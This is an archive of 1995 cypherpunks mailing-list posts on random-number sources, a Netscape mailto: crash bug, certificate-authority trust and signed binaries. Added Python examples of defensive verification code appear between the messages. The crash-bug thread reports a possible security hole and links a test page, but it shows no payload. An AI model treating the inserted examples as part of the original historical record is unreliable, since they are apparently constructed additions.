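if __name__ == "__main__":
    print("silent line:", assess_raw_block(SILENT_RAW))
    pad = condition(counter_input(4096))   # zero entropy in, 64 KiB of pad out
    print("predictable input, hashed: %.3f bits/byte by histogram"
          % shannon_bits_per_byte(pad))
```

The hashed counter scores close to 8 bits per byte and will not compress, although anyone can regenerate it; the raw-side check is the one that carries information.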




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 2 Oct 95 21:45:15 PDT
To: Dave Dittrich <dittrich@cac.washington.edu>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <9510021817.AA01271@red2.cac.washington.edu>
Message-ID: <199510030445.AAA29715@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dave Dittrich writes:
> 
> > Perry writes, regarding alpha decay counts for random numbers:
> > 
> > > And, as I noted, there are RS232 interfaceable radiation detectors you
> > > can buy off the shelf -- no hardware hacking needed.

> I was thinking about this the other day and wondered if it wouldn't be
> cheap and relatively easy to build a board that samples and sums
> several randomly selected signals on various frequencies on the AM
> broadcast spectrum.

Radio signals can be interfered with or listened to -- never
underestimate the opponent. Computer interfaced radiation detectors,
in spite of Tim's claim to the contrary, are pretty cheap and very
hard to interfere with.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 2 Oct 95 21:51:48 PDT
To: hallam@w3.org
Subject: Re: WHERE did this come from?
In-Reply-To: <9510021655.AA07536@zorch.w3.org>
Message-ID: <199510030454.AAA06674@homeport.org>
MIME-Version: 1.0
Content-Type: text


hallam@w3.org wrote:

| It appears that someone may have obtained the cypherpunks mailing
| list and used it as the basis for the Spam. This is a serious matter.

You mean the list of folks subscribed to cypherpunks?  The list that
you get by sending mail to majordomoe@toad.com with a body of 'who
cypherpunks'?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 3 Oct 95 00:04:11 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: Crypto APIs
Message-ID: <199510030459.AAA71133@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Matt writes:

<snip>

>Yes.  (ICE, by the way, is funded by ARPA and run by TIS.  Strange notion
>of "experiment", given that the result of the "experiment" will be to see
>whether the government will allow it.  So one part of DoD is funding TIS
>to find out how another part of DoD behaves...)

Your tax dollars at work.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

 "One of the penalties for refusing to participate in politics is
  that you end up being governed by your inferiors."  -- Plato
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 3 Oct 95 01:45:32 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <199510030840.BAA04677@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Doesn't crash on SunOS 4.1.3_U1 running X11R6.

> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 2 Oct 95 19:48:34 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <9510030248.AA08909@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



On the topic of risks for a "major browser" to be tampered/targeted
as a virus :

I asked months ago netscape folks to make md5sum and/or PGP digital
signatures (preferably md5sum of each files, this in a file, itself
pgp signed) of the binaries available on their page and on relevant 
newsgroup to reduce possibility of tampering.

[ok it won't help mythical joe six pack's but...]

Maybe I'll have more luck calling from here :-)


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

SEAL Team 6 SDI NORAD Nazi mururoa cryptographic Panama
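
An added example, not from any poster in the thread, of the checksum scheme this message and Douglas Barnes's reply describe: one digest per file in a manifest, the manifest fetched over several independent channels, and a download accepted only when enough channels agree on its digest. SHA-256 is swapped in for md5sum, the PGP signature over the manifest is left out, and the file name, channel names and contents are constructed.

```python
import hashlib
import hmac
from collections import Counter

NAME = "browser-1.12.tar.Z"          # hypothetical file name
GOOD = b"constructed stand-in for the released binary\n"
TAMPERED = GOOD + b"bytes added on an untrusted mirror\n"


def manifest_line(data, name):
    """One sha256sum-style line: '<hex digest>  <file name>'."""
    return "%s  %s\n" % (hashlib.sha256(data).hexdigest(), name)


# Constructed channel contents: two official channels and one altered mirror.
CHANNELS = {
    "official-ftp": manifest_line(GOOD, NAME),
    "newsgroup": manifest_line(GOOD, NAME),
    "mirror": manifest_line(TAMPERED, NAME),
}


def parse_manifest(text):
    """Map file name to digest; tolerates the '*' binary-mode marker."""
    entries = {}
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) == 2:
            entries[parts[1].lstrip("*")] = parts[0].lower()
    return entries


def agreed_digest(name, manifests, quorum):
    """Return (digest, dissenting_channels). digest is None unless exactly
    one digest is published by at least quorum channels."""
    seen = {ch: parse_manifest(text).get(name) for ch, text in manifests.items()}
    votes = Counter(d for d in seen.values() if d)
    winners = [d for d, count in votes.items() if count >= quorum]
    if len(winners) != 1:
        return None, sorted(ch for ch, d in seen.items() if d)
    return winners[0], sorted(ch for ch, d in seen.items()
                              if d and d != winners[0])


def verify_download(data, name, manifests, quorum=2):
    """Accept data only if it matches the digest a quorum of channels gives."""
    expected, dissent = agreed_digest(name, manifests, quorum)
    if expected is None:
        return False, "no single digest is backed by %d channels" % quorum
    actual = hashlib.sha256(data).hexdigest()
    if not hmac.compare_digest(actual, expected):
        return False, "download does not match the agreed digest"
    if dissent:
        return True, "ok, but these channels disagree: " + ", ".join(dissent)
    return True, "ok"


if __name__ == "__main__":
    print("good file, 3 channels: ", verify_download(GOOD, NAME, CHANNELS))
    print("tampered, 3 channels:  ", verify_download(TAMPERED, NAME, CHANNELS))
    only_mirror = {"mirror": CHANNELS["mirror"]}
    print("tampered, mirror only: ",
          verify_download(TAMPERED, NAME, only_mirror, quorum=1))
```

The last case is the failure the multi-channel advice addresses: a checksum fetched from the same place as the binary verifies whatever that place serves.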




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 01:36:55 PDT
To: cypherpunks@toad.com
Subject: New Netscape bug (in version 1.12)
Message-ID: <199510030836.EAA09080@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



C'punks, 
  I just got back from a vacation in Raleigh, and downloaded the
new "fixed" Netscape 1.12. It took me about an hour, but I've
discovered another bug and potential security hole. This one relates
to mailto:.

  The bug is as follows. Create a HTML file with a hyperlink containing
the following URL

 foo 

This bug doesn't seem to crash Netscape, instead, it crashes my XServer
as soon as the mail window pops up. I'm too tired right now to try to
analyze it, but it might be another stack bug, this time, in the X
libraries because Netscape isn't doing any sanity checking.

I need help testing this bug on other platforms. I have created
a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
to test.

I have also found 2 other bugs that cause stack trashing in v1.1
however, they are random and I haven't been able to isolate them
completely yet. (I have created a page on my system, such that if you
visit it, after you visit about 3 more pages, it crashes)

What's my point in pursuing this? Netscape's browser is a piece of
software that runs on millions of computers and in effect, allows
outside agents to input arbitrary data into that software. As such,
it is unlike most applications made. Sure, Microsoft Word may have bugs,
but how many people are downloading hundreds of MS Word documents
every day and viewing them? Users of Web browsers are exposing themselves
like this every day, and so I think that web browsers must have higher
standards of robustness.


I think Netscape represents an enormous risk to computer security,
and while I think they are heading in the right direction, there are
some very basic implementation issues they need to clear up which are
orthogonal to SSL and credit card transactions. All the cryptography
in the world won't help you if someone can subvert your cryptobox.
Netscape needs to do some serious quality assurance work. I've never
been a QA person in my life, but within a few minutes, I have been
able to find serious bugs in the software. And while I'm sure
Netscape's coders are fine people, proof reading your own code,
code that you look at everyday, becomes rather hard because you
tend to "see through it". (just like proof reading essays, or messages)
I think Netscape should hire some outside firm/group to review their
code under non-disclosure for potential implementation holes.

-Ray Cromwell <rjc@clark.net>
P.S. I am running Netscape v1.12 under BSDI2.0 and the XAccel/2.0 server


 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 01:57:17 PDT
To: sameer@c2.org (sameer)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030840.BAA04677@infinity.c2.org>
Message-ID: <199510030857.EAA10604@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Doesn't crash on SunOS 4.1.3_U1 running X11R6.
> 
> > I need help testing this bug on other platforms. I have created
> > a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> > to test.

Thanks for the info.

  It may be a bug in BSDI's Xserver then. However, the overlong
domain bug is also a bug in the NIS code. So while the crash
may not occur within Netscape code itself, I am a little wary 
that it is not performing sanity checking. If it turns out to do nasty
stuff to Windows clients, then it may be significant.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 02:20:50 PDT
To: sameer@c2.org (sameer)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030840.BAA04677@infinity.c2.org>
Message-ID: <199510030920.FAA12203@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 	Doesn't crash on SunOS 4.1.3_U1 running X11R6.

  Just tried it under NT 3.5 with Netscape 1.1. It didn't crash
as soon as the mail window popped up (like it does under my
BSDI2.0), however clicking on "send" caused Netscape to quit/die
(but not with any GPF or failure). Varying the length and data in the
mailto may have other effects.


-Ray

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 3 Oct 95 03:02:16 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <Pine.SUN.3.91.951003060032.26587B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


It doesn't crash Windoze (hardly surprising).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 2 Oct 95 23:13:30 PDT
To: cypherpunks@toad.com
Subject: Re: Spoofing HTTP server certificates
In-Reply-To: <199510020737.AAA27256@ix7.ix.netcom.com>
Message-ID: <44qk8v$igc@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510020737.AAA27256@ix7.ix.netcom.com>, stewarts@ix.netcom.com (Bill Stewart) writes:
> At 12:52 AM 10/2/95 -0400, Greg Miller <gmiller@grendel.ius.indiana.edu> wrote:
> >	Since there has been a lot of talk about the "man in the middle" 
> >attack on the secure web servers, has anyone actually considered the 
> >processing time required to fake a certificate from scratch?
> >	I haven't really familiarized myself with how the certificates 
> >are generated, etc, but it's my understanding that they are signed with RSA.
> 
> While I haven't seen Verisign's various public keys posted to the net,
> and didn't see them anywhere on their web page, I assume they're at least
> 508 bits long, and the ones for better-than-persona certification
> (or at least Class 3) ought to be ~1024 bits long, unless they're limiting
> themselves to 512 bits to support software that's limited by ITAR stupidity
> (which would be a shame, but is certainly possible.)

  You can see the certificate (including public key) for RSA/Verisign's
secure server authority by looking at:

	http://home.netscape.com/newsref/ref/rsa-server-ca.html

  It is a >1000 bit key.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 2 Oct 95 23:20:12 PDT
To: cypherpunks@toad.com
Subject: Re: User-Specified Trusted CAs in Netscape (Was: Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <199510012043.NAA06905@illilouette.Eng.Sun.COM>
Message-ID: <44qklr$igc@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510020516.BAA21934@giane.cs.umass.edu>, futplex@pseudonym.com (Futplex) writes:
> Bill Soley writes:
> > (3) Netscape is making the problem worse (yes, worse) in the next release
> > by allowing the user to specify their own list of trusted CAs.  (I will
> > elaborate on this unpopular view below.)
> [...]
> > Re: problem 3, about how allowing the user to specify their own list of
> > trusted CAs is bad.  
> [...]
> > it.  Even Mary Moderately-Savvy might be tricked into doing it on the
> > false assumption that it would only affect security for the naughty
> > pictures site (that she may not care about), and not affect security for
> > her stock-broker.  This false assumption might be based on the fact
> > that the (legitimate) stock-broker uses a different CA.
> 
> You seem to be overstating your point a bit. The real problem here, AFAICS,
> is that the proposed protocol in the software wouldn't allow sufficiently 
> fine-grained control over the certification authority approval. The user
> should be able to specify the conditions under which a CA is to be trusted,
> not simply give a blanket approval or rejection. 
> 
> It looks as though a set of trusted (CA, site) pairs would suffice. 
> How about it, Netscape ?  Give the user the opportunity to say "I trust 
> certificates from Alfie's World of Key Certification regarding keys for
> interactions with Elvira's Copier Shack."

  We've already thought of a lot of the stuff you guys have brought up,
and tried to address them in our design.  I'm also taking note on things
we didn't think of.

  There will be various "domains" that you can trust a CA for, including
SSL, e-mail, and payment.  You will be able to enable and disable trust
for specific server certs as well.  You could say, "I don't trust
verisign, but I will trust Joe's Internet Coffee Shop (which happens
to be signed by verisign)".

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
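
A model of the trust decision discussed in this thread (per-usage CA trust, (CA, site) pairs, and per-certificate overrides), added here as an illustration; it is not Netscape's code. The class and field names, the precedence order, the `.example` hosts and the fingerprint strings are assumptions, and certificates are assumed to have had their signature chain verified already.

```python
from dataclasses import dataclass, field

# The trust "domains" named in the message above.
USAGES = frozenset({"ssl", "email", "payment"})


@dataclass(frozen=True)
class Cert:
    """A certificate whose signature chain is assumed to be verified already."""
    issuer: str
    site: str
    fingerprint: str  # constructed placeholder values in this example


@dataclass
class TrustStore:
    ca_usages: dict = field(default_factory=dict)       # CA -> set of usages
    ca_site_pairs: set = field(default_factory=set)     # {(CA, site)}
    cert_overrides: dict = field(default_factory=dict)  # fingerprint -> bool

    def trust_ca(self, ca, usages):
        unknown = set(usages) - USAGES
        if unknown:
            raise ValueError(f"unknown usage(s): {sorted(unknown)}")
        self.ca_usages[ca] = set(usages)

    def trust_pair(self, ca, site):
        self.ca_site_pairs.add((ca, site.lower()))

    def override_cert(self, fingerprint, trusted):
        self.cert_overrides[fingerprint] = bool(trusted)

    def decide(self, cert, usage):
        """Return (trusted, reason). Precedence is an assumption of this model:
        most specific rule first, so a blanket CA decision never silently
        widens or overrides what the user said about one site or one cert."""
        if usage not in USAGES:
            raise ValueError(f"unknown usage: {usage}")
        if cert.fingerprint in self.cert_overrides:
            return self.cert_overrides[cert.fingerprint], "per-certificate override"
        if (cert.issuer, cert.site.lower()) in self.ca_site_pairs:
            return True, "CA trusted for this site only"
        if usage in self.ca_usages.get(cert.issuer, ()):
            return True, f"CA trusted for {usage}"
        return False, "no applicable trust"


def example_store():
    """The scenarios from the thread, with constructed hosts and fingerprints."""
    store = TrustStore()
    # "I trust certificates from Alfie's ... for interactions with Elvira's."
    store.trust_pair("Alfie's World of Key Certification", "elvira.example")
    # "I don't trust verisign, but I will trust Joe's Internet Coffee Shop."
    store.override_cert("fp-joes-coffee", True)
    # A CA trusted for e-mail but not for SSL or payment.
    store.trust_ca("Example Mail CA", {"email"})
    return store


if __name__ == "__main__":
    s = example_store()
    alfie = "Alfie's World of Key Certification"
    for cert, usage in [
        (Cert(alfie, "elvira.example", "fp-elvira"), "ssl"),
        (Cert(alfie, "broker.example", "fp-broker"), "ssl"),
        (Cert("verisign", "joes-coffee.example", "fp-joes-coffee"), "ssl"),
        (Cert("verisign", "other.example", "fp-other"), "ssl"),
    ]:
        print(cert.site, usage, s.decide(cert, usage))
```

The second case is the one Bill Soley's objection turns on: approving a CA for one site does not make the same CA's certificate for the stock-broker acceptable.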




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 2 Oct 95 23:34:59 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <9510030147.AA15570@dmsd.com>
Message-ID: <44qlhk$igc@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9510030248.AA08909@hplyot.obspm.fr>, dl@hplyot.obspm.fr (Laurent Demailly) writes:
> 
> On the topic of risks for a "major browser" to be tampered/targeted
> as a virus :
>
> I asked the Netscape folks months ago to make md5sum and/or PGP digital
> signatures (preferably md5sum of each file, this in a file, itself
> PGP signed) of the binaries available on their page and on relevant
> newsgroups to reduce the possibility of tampering.
> 
> [ok it won't help mythical joe six pack's but...]
> 
> Maybe I'll have more luck calling from here :-)

  I've been thinking about this recently for obvious reasons.  My concern
is that if someone can attack your download of netscape, they could also
attack your download of the program that validates netscape.  Is there
really any way out of this one?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
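
The per-file digest manifest proposed in this thread, with the manifest itself authenticated before any entry in it is believed, as an added example that is not from any of the posters or from Netscape. It uses SHA-256 in place of MD5 (which is no longer collision resistant), and a digest of the manifest pinned out of band stands in for the PGP signature check; the function names and sample files are constructed.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

HEX = set("0123456789abcdef")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text):
    """Parse '<sha256>  <relative path>' lines (the sha256sum/md5sum layout)."""
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        digest, mode, name = line[:64].lower(), line[64:66], line[66:]
        if len(digest) != 64 or set(digest) - HEX or mode not in ("  ", " *") or not name:
            raise ValueError(f"line {lineno}: not a '<sha256>  <path>' entry")
        p = Path(name)
        if p.is_absolute() or ".." in p.parts:
            raise ValueError(f"line {lineno}: path escapes the release directory")
        if name in entries:
            raise ValueError(f"line {lineno}: duplicate entry for {name}")
        entries[name] = digest
    return entries


def verify_release(directory, manifest_bytes, pinned_manifest_sha256):
    """Check every file against the manifest, but only after the manifest
    itself matches a value obtained through a separate channel (assumption:
    this pin plays the role of the PGP signature in the original proposal)."""
    actual = hashlib.sha256(manifest_bytes).hexdigest()
    if not hmac.compare_digest(actual, pinned_manifest_sha256.lower()):
        raise ValueError("manifest does not match the pinned digest")
    entries = parse_manifest(manifest_bytes.decode("utf-8"))
    root = Path(directory)
    report = {"ok": [], "mismatch": [], "missing": [], "unlisted": []}
    for name, expected in sorted(entries.items()):
        target = root / name
        if not target.is_file():
            report["missing"].append(name)
        elif hmac.compare_digest(sha256_file(target), expected):
            report["ok"].append(name)
        else:
            report["mismatch"].append(name)
    # Files shipped in the directory but absent from the manifest are suspect too.
    on_disk = {p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file()}
    report["unlisted"] = sorted(on_disk - set(entries))
    return report


def build_manifest(root, names):
    return "".join(f"{sha256_file(root / n)}  {n}\n" for n in names).encode()


def demo():
    """Constructed release: clean check, modified file, then a rewritten manifest."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "browser").write_bytes(b"constructed binary v1\n")
        (root / "README").write_bytes(b"constructed readme\n")
        names = ("README", "bin/browser")
        manifest = build_manifest(root, names)
        pin = hashlib.sha256(manifest).hexdigest()  # published out of band
        clean = verify_release(root, manifest, pin)

        (root / "bin" / "browser").write_bytes(b"constructed binary, modified\n")
        (root / "extra.so").write_bytes(b"constructed extra file\n")
        tampered = verify_release(root, manifest, pin)

        # Whoever changed the binary can also regenerate the manifest; the
        # pin is what stops that from passing.
        forged = build_manifest(root, names)
        try:
            verify_release(root, forged, pin)
            forged_result = "accepted"
        except ValueError:
            forged_result = "rejected"
        return clean, tampered, forged_result


if __name__ == "__main__":
    for part in demo():
        print(part)
```

The bootstrap question raised above remains: the pin (or the signing key's fingerprint) and the verifier itself have to arrive by a path the download channel does not control.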




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Tue, 3 Oct 95 04:15:50 PDT
To: cypherpunks@toad.com
Subject: CISS TSP MISSI
Message-ID: <199510031115.HAA21583@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.disa.mil/ciss/tsp.html


  INFOSEC TRAINING AND SECURITY PRODUCTS (TSP) DEPARTMENT
  
   
   
   The INFOSEC Training and Security Products Department is responsible
   for developing, coordinating and executing a DoD-wide INFOWAR
   education, training and awareness program; creating an INFOWAR Career
   Management Program for DoD; and developing, coordinating, documenting
   and executing DoD-wide procedures to identify and disseminate INFOSEC
   products to meet DoD-wide INFOWAR requirements.

   This department of CISS is also responsible for the update and
   distribution of the Multilevel Information Systems Security Initiative
   (MISSI) Implementation Guide. The MISSI Guide is a planning tool,
   enabling DoD and other agencies to determine resource requirements to
   implement various MISSI services into their infrastructure.

   [Insert Multilevel Security (MLS) excerpt]

   The MLS Program is partnered with NSA's Multilevel Information Systems
   Security Initiative (MISSI). The MISSI Program is intended to provide
   a set of MLS technologies that comply with the DoD Goal Security
   Architecture. These technologies, when developed over the next five
   years, will be implemented in operational environments by the MLS
   Program. In the meantime, the MLS Program will continue to identify,
   assess, and implement commercially available MLS technologies to
   satisfy immediate MLS requirements throughout DoD.

   [End insert]

   The DISSPATCH newsletter, an INFOSEC publication is published 4 times
   per year by TSP. Electronic copies will be loaded here soon.

   The Security Products Database is a stand-alone database containing
   information on over 400 security products, to include their technical
   characteristics and points of contact.

   TSP is also building an INFOSEC Training Facility (ITF) at our Falls
   Church, Virginia location. The ITF will provide state of the art
   information systems security training to include the suite MISSI
   educational offerings.
   
   
   
   Commercial telephone: (703) 681-1325, DSN: 761-1325
   
   
   
   yorkw@cc.ims.disa.mil Last Revision - 31 August 1995
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 3 Oct 95 07:38:58 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <DFv6uo.4so@sgi.sgi.com>
Message-ID: <199510031438.HAA06918@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFv6uo.4so@sgi.sgi.com>, Ray Cromwell <rjc@clark.net> writes:

> C'punks, 
>   I just got back from a vacation in Raleigh, and downloaded the
> new "fixed" Netscape 1.12. It took me about an hour, but I've
> discovered another bug and potential security hole. This one relates
> to mailto:.

>   The bug is as follows. Create an HTML file with a hyperlink containing
> the following URL

>  foo 

> This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> as soon as the mail window pops up. I'm too tired right now to try to
> analyze it, but it might be another stack bug, this time, in the X
> libraries because Netscape isn't doing any sanity checking.

This is a bug in your X server, not in netscape.  The X server should
never crash no matter what you send to it.

> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.

This doesn't crash my X server (SGI Irix 6.2), so it's probably specific
to XAccel.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@ee.siue.edu>
Date: Tue, 3 Oct 95 05:59:07 PDT
To: rjc@clark.net
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <199510031259.HAA01229@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


It doesn't crash Solaris 2.4 running X11R5 (Netscape 1.1N)

> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.

-Arve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Oct 95 06:18:06 PDT
To: cypherpunks@toad.com
Subject: Telco Blob
Message-ID: <199510031308.JAA10163@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Financial Times of October 3 has a humongous 40-page insert
   on international telecommunications -- markets, business,
   technology, and, to be sure, the tele-players lying,
   cheating, fearing the "computer hacking industry,"
   whimpering with delirious greed at the bountiful,
   multicultured consumer's mindless credulity of tekkie-
   gadgets. For the mil-beguiled Colin Powells there's even a
   colored global map of Big Blob telco strategic rapacity.

   A tiny cheering blip of machine-wash-n-readable T-stupidity
   on p. 34:

      Sutton dismisses worries about security -- despite a
      recent successful attempt to break the security on
      Internet financial transactions. An incident in August,
      when a researcher at the French National Institute of
      Computer Science and Control (INRIA) broke into the
      Internet security system, raised concerns about
      security.

      "A lot of security is about perception -- after all,
      every code can be broken. The INRIA incident only
      involved breaking a single code and needed massive
      computer resources to do it," says Mr Sutton.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Tue, 3 Oct 95 07:16:06 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <v01510102ac9701a9005a@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ray Cromwell wrote:
>  The bug is as follows. Create an HTML file with a hyperlink containing
>the following URL
>
> foo 
>
>This bug doesn't seem to crash Netscape, instead, it crashes my XServer
>as soon as the mail window pops up. I'm too tired right now to try to
>analyze it, but it might be another stack bug, this time, in the X
>libraries because Netscape isn't doing any sanity checking.
>
>I need help testing this bug on other platforms. I have created
>a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
>to test.

Nothing on Mac Netscape 1.12 nor on the latest Windows 3.x Netscape.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMHFRwHIf3YegbdiBAQGR6wJXTcCiqgHeunkdLyd1kGUhRTx2JP0p1PN3
UKdThUKLTL7utPDFevRORjF/3B/ziVszJlk+5PASfQeF6DlKYG8ib9Fr0OdW1E0p
CPRK
=6T18
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Tue, 3 Oct 95 02:50:31 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <44r106$moh@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  I tested your crash page on 1.12 for SGI, and 2.0 on SGI and Windows NT,
and none of them had any problem.

  I spent five years working on the X server, and my credo then was that if the
X server crashes, it's a bug in the X server, no matter what wild
shit the client throws at it.  (I feel the same way about netscape now...)

  I suggest you complain to your X server vendor.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 3 Oct 95 06:51:14 PDT
To: cypherpunks@toad.com
Subject: ZIT_pus
Message-ID: <199510031351.JAA09367@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-3-95. Wash Rag:


   "Employment Database Proposal Raises Cries of 'Big
   Brother'."

      Critics say that in its zeal to combat illegal
      immigration, Congress is steering the nation toward an
      "Orwellian nightmare," an era of all-knowing federal
      oversight whereby officials will be able to verify
      citizenship by using high-tech national identification
      cards. So far, no member of Congress has openly called
      for a national ID card, at least by that name.

      Rep. Bill McCollum (R-Fla.) said he intends to offer an
      amendment on the House floor to create a "more secure"
      Social Security card with a photo, a hologram and
      "perhaps a biometric identifier."

      Microchip technology can make ID cards especially
      intrusive. According to an analysis by the Cato
      Institute, one newly patented ID card can hold a photo
      and 1,600 pages of text. Another identification system
      developed by a major defense contractor consists of a
      microchip the size of a grain of rice that can be
